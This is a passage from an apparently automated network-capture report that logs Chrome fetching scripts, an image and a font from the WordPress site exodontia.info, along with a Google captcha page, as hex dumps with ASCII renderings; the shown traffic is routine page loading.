                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:04 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 3f 63 6c 69 65 6e 74 3d 63 68 72 6f 6d 65 2d 6f 6d 6e
                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/complete/search?client=chrome-omn
                                                                                                                                      2024-04-24 10:14:04 UTC1255INData Raw: 72 20 77 65 62 20 62 72 6f 77 73 65 72 2e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74
                                                                                                                                      Data Ascii: r web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recapt
                                                                                                                                      2024-04-24 10:14:04 UTC1255INData Raw: 76 69 6f 72 2e 20 54 68 69 73 20 70 61 67 65 20 63 68 65 63 6b 73 20 74 6f 20 73 65 65 20 69 66 20 69 74 27 73 20 72 65 61 6c 6c 79 20 61 20 68 75 6d 61 6e 20 73 65 6e 64 69 6e 67 20 74 68 65 20 72 65 71 75 65 73 74 73 20 61 6e 64 20 6e 6f 74 20 61 20 72 6f 62 6f 74 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 74 68 69 73 20 6e 65 74 77 6f 72 6b 2e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 66 6f 44 69 76 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65
                                                                                                                                      Data Ascii: vior. This page checks to see if it's really a human sending the requests and not a robot coming from this network. <br><br><div id="infoDiv" style="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">This page appe
                                                                                                                                      2024-04-24 10:14:04 UTC102INData Raw: 74 3d 30 26 61 6d 70 3b 67 73 5f 72 6e 3d 34 32 26 61 6d 70 3b 73 75 67 6b 65 79 3d 41 49 7a 61 53 79 42 4f 74 69 34 6d 4d 2d 36 78 39 57 44 6e 5a 49 6a 49 65 79 45 55 32 31 4f 70 42 58 71 57 42 67 77 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: t=0&amp;gs_rn=42&amp;sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw<br></div></div></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      109192.168.2.1649861153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:03 UTC583OUTGET /wp-content/plugins/loading-page/js/loading-page.min.js?ver=free-1.1.10 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:04 UTC597INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:04 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Wed, 17 Apr 2024 22:07:26 GMT
                                                                                                                                      etag: "13a4-6620481e-5e29d00d26cf3c43;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 5028
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:04 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:04 UTC771INData Raw: 76 61 72 20 24 6a 73 63 6f 6d 70 3d 24 6a 73 63 6f 6d 70 7c 7c 7b 7d 3b 24 6a 73 63 6f 6d 70 2e 73 63 6f 70 65 3d 7b 7d 3b 24 6a 73 63 6f 6d 70 2e 66 69 6e 64 49 6e 74 65 72 6e 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 3d 53 74 72 69 6e 67 28 61 29 29 3b 66 6f 72 28 76 61 72 20 66 3d 61 2e 6c 65 6e 67 74 68 2c 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 7b 76 61 72 20 68 3d 61 5b 67 5d 3b 69 66 28 65 2e 63 61 6c 6c 28 62 2c 68 2c 67 2c 61 29 29 72 65 74 75 72 6e 7b 69 3a 67 2c 76 3a 68 7d 7d 72 65 74 75 72 6e 7b 69 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 41 53 53 55 4d 45 5f 45 53 35 3d 21 31 3b 24 6a 73 63 6f 6d 70 2e 41 53 53 55 4d 45 5f 4e 4f 5f 4e
                                                                                                                                      Data Ascii: var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.findInternal=function(a,e,b){a instanceof String&&(a=String(a));for(var f=a.length,g=0;g<f;g++){var h=a[g];if(e.call(b,h,g,a))return{i:g,v:h}}return{i:-1,v:void 0}};$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_N
                                                                                                                                      2024-04-24 10:14:04 UTC4257INData Raw: 6e 67 74 68 2d 31 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 61 5b 66 5d 3b 67 20 69 6e 20 62 7c 7c 28 62 5b 67 5d 3d 7b 7d 29 3b 62 3d 62 5b 67 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 66 3d 62 5b 61 5d 3b 65 3d 65 28 66 29 3b 65 21 3d 66 26 26 6e 75 6c 6c 21 3d 65 26 26 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 62 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 65 7d 29 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 70 6f 6c 79 66 69 6c 6c 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 24 6a 73 63 6f 6d 70 2e 66 69
                                                                                                                                      Data Ascii: ngth-1;f++){var g=a[f];g in b||(b[g]={});b=b[g]}a=a[a.length-1];f=b[a];e=e(f);e!=f&&null!=e&&$jscomp.defineProperty(b,a,{configurable:!0,writable:!0,value:e})}};$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,b){return $jscomp.fi


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      110192.168.2.1649862153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:03 UTC588OUTGET /wp-content/plugins/wp-gdpr-compliance/Assets/js/front.min.js?ver=1706555011 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:04 UTC598INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:04 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 29 Jan 2024 19:03:31 GMT
                                                                                                                                      etag: "e6f5-65b7f683-e34d52d6c54ec386;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 59125
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:04 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:04 UTC770INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 66 72 6f 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 3a 74 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 25 5b 61 2d 66 30 2d 39 5d 7b 32 7d 22 2c 72 3d 6e 65 77 20 52 65 67 45 78 70 28 65 2c 22 67 69 22 29 2c 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 28 22 2b 65 2b 22 29 2b 22 2c 22 67 69 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 2e 6a 6f 69 6e 28 22 22 29 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 31 3d 3d 3d 74 2e 6c 65 6e 67 74 68
                                                                                                                                      Data Ascii: /*! For license information please see front.min.js.LICENSE.txt */(()=>{var t={20:t=>{"use strict";var e="%[a-f0-9]{2}",r=new RegExp(e,"gi"),n=new RegExp("("+e+")+","gi");function o(t,e){try{return decodeURIComponent(t.join(""))}catch(t){}if(1===t.length
                                                                                                                                      2024-04-24 10:14:04 UTC14994INData Raw: 74 72 79 7b 65 5b 72 5b 30 5d 5d 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 5b 30 5d 29 7d 63 61 74 63 68 28 74 29 7b 76 61 72 20 6f 3d 69 28 72 5b 30 5d 29 3b 6f 21 3d 3d 72 5b 30 5d 26 26 28 65 5b 72 5b 30 5d 5d 3d 6f 29 7d 72 3d 6e 2e 65 78 65 63 28 74 29 7d 65 5b 22 25 43 32 22 5d 3d 22 ef bf bd 22 3b 66 6f 72 28 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2c 73 3d 30 3b 73 3c 61 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 61 5b 73 5d 3b 74 3d 74 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 63 2c 22 67 22 29 2c 65 5b 63 5d 29 7d 72 65 74 75 72 6e 20 74 7d 28 74 29 7d 7d 7d 2c 38 30 36 3a 74 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f
                                                                                                                                      Data Ascii: try{e[r[0]]=decodeURIComponent(r[0])}catch(t){var o=i(r[0]);o!==r[0]&&(e[r[0]]=o)}r=n.exec(t)}e["%C2"]="";for(var a=Object.keys(e),s=0;s<a.length;s++){var c=a[s];t=t.replace(new RegExp(c,"g"),e[c])}return t}(t)}}},806:t=>{"use strict";t.exports=functio
                                                                                                                                      2024-04-24 10:14:04 UTC16384INData Raw: 6e 63 74 69 6f 6e 20 4f 28 74 2c 72 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 72 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 6e 3d 3d 3d 65 29 7b 69 66 28 72 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 72 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 72 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 72 2e 61 72 67 3d 65 2c 4f 28 74 2c 72 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 72 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 79 3b 72 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 72 2e 61 72 67 3d 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 69 74 65 72 61 74 6f 72 20 64 6f 65 73 20 6e 6f 74 20 70 72 6f 76 69 64 65 20 61 20 27 74 68 72 6f 77 27 20 6d 65
                                                                                                                                      Data Ascii: nction O(t,r){var n=t.iterator[r.method];if(n===e){if(r.delegate=null,"throw"===r.method){if(t.iterator.return&&(r.method="return",r.arg=e,O(t,r),"throw"===r.method))return y;r.method="throw",r.arg=new TypeError("The iterator does not provide a 'throw' me
                                                                                                                                      2024-04-24 10:14:05 UTC16384INData Raw: 6e 65 72 73 28 29 2c 74 68 69 73 2e 73 63 72 6f 6c 6c 42 65 68 61 76 69 6f 75 72 28 22 65 6e 61 62 6c 65 22 29 2c 74 68 69 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 26 26 74 68 69 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2e 66 6f 63 75 73 26 26 74 68 69 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2e 66 6f 63 75 73 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6f 6e 43 6c 6f 73 65 28 74 68 69 73 2e 6d 6f 64 61 6c 2c 74 68 69 73 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 2c 74 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 61 77 61 69 74 43 6c 6f 73 65 41 6e 69 6d 61 74 69 6f 6e 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6f 70 65 6e 43 6c 61 73 73 3b 74 68 69 73 2e 6d 6f 64 61 6c 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61
                                                                                                                                      Data Ascii: ners(),this.scrollBehaviour("enable"),this.activeElement&&this.activeElement.focus&&this.activeElement.focus(),this.config.onClose(this.modal,this.activeElement,t),this.config.awaitCloseAnimation){var r=this.config.openClass;this.modal.addEventListener("a
                                                                                                                                      2024-04-24 10:14:05 UTC10593INData Raw: 65 74 22 3d 3d 3d 72 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 74 29 3b 69 66 28 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 72 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 72 29 29 72 65 74 75 72 6e 20 64 74 28 74 2c 65 29 7d 28 74 2c 65 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73
                                                                                                                                      Data Ascii: et"===r)return Array.from(t);if("Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r))return dt(t,e)}(t,e)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects mus


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      111192.168.2.1649864153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:04 UTC630OUTGET /wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:05 UTC582INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:04 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:21 GMT
                                                                                                                                      etag: "1408-64623fe1-f4dda720282e0aae;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 5128
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:04 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:05 UTC1368INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 2d 00 00 00 39 08 06 00 00 00 fa 31 1b d6 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 f7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                                      Data Ascii: PNGIHDR-91pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RD
                                                                                                                                      2024-04-24 10:14:05 UTC3760INData Raw: 35 35 2d 38 38 31 35 35 62 30 33 32 35 63 64 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 31 2d 30 36 2d 30 38 54 31 36 3a 35 31 3a 31 35 2b 30 31 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 2f 72 64 66 3a 53 65 71 3e 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 1f 27 92 28 00 00 0d b7 49 44 41 54 78 9c ed 9d d1 71 e3 38 0c 86 ff bd b9 02 8e 2d 24 ef a7 07 a7 84
                                                                                                                                      Data Ascii: 55-88155b0325cd" stEvt:when="2021-06-08T16:51:15+01:00" stEvt:softwareAgent="Adobe Photoshop 22.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>'(IDATxq8-$


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      112192.168.2.1649865153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:04 UTC686OUTGET /wp-content/plugins/loading-page/css/fonts/JTURjIg1_i6t8kCHKm45_bZF3gnD_g.woff2 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://exodontia.info
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://exodontia.info/wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:05 UTC584INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:05 GMT
                                                                                                                                      content-type: font/woff2
                                                                                                                                      last-modified: Wed, 17 Apr 2024 22:07:26 GMT
                                                                                                                                      etag: "4d70-6620481e-3fd96f46af04c38f;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 19824
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:05 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:05 UTC1368INData Raw: 77 4f 46 32 00 01 00 00 00 00 4d 70 00 11 00 00 00 00 c0 0c 00 00 4d 0d 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 58 1b e5 5c 1c 89 5e 06 60 00 85 10 08 81 64 09 9a 6d 11 08 0a 81 cc 50 81 b2 2f 0b 84 3c 00 01 36 02 24 03 88 66 04 20 05 83 7a 07 8a 4c 0c 81 55 1b 84 af 35 6c 9b c6 3d bb 1d 00 ae ce f7 b4 b3 03 35 6c 1c 40 33 6c f9 cc 6c 44 ec 76 10 25 28 3d 95 fd ff 27 25 a8 21 e2 1e e2 0e 20 4d eb ac e9 54 28 30 99 91 c2 44 75 da 19 49 36 ea 2c 1d b5 5a dd 51 9a 9c 1d 45 a1 75 c5 37 a0 7a ff f8 77 85 69 93 a7 8b db e0 41 79 11 2e 35 d0 d3 fc 9a 7e dd a5 7d 45 60 b7 78 42 e9 97 30 db dc 53 39 9d 1e 98 23 6f 93 f3 38 75 d8 cc 10 36 2d 16 a7 cc ad 52 7e ed b9 84 65 7d bc 4b bc 1a 5b c5 1f 43 73 6d e5 ff 54 f8 61 1e 5c d0 36
                                                                                                                                      Data Ascii: wOF2MpMX\^`dmP/<6$f zLU5l=5l@3llDv%(='%! MT(0DuI6,ZQEu7zwiAy.5~}E`xB0S9#o8u6-R~e}K[CsmTa\6
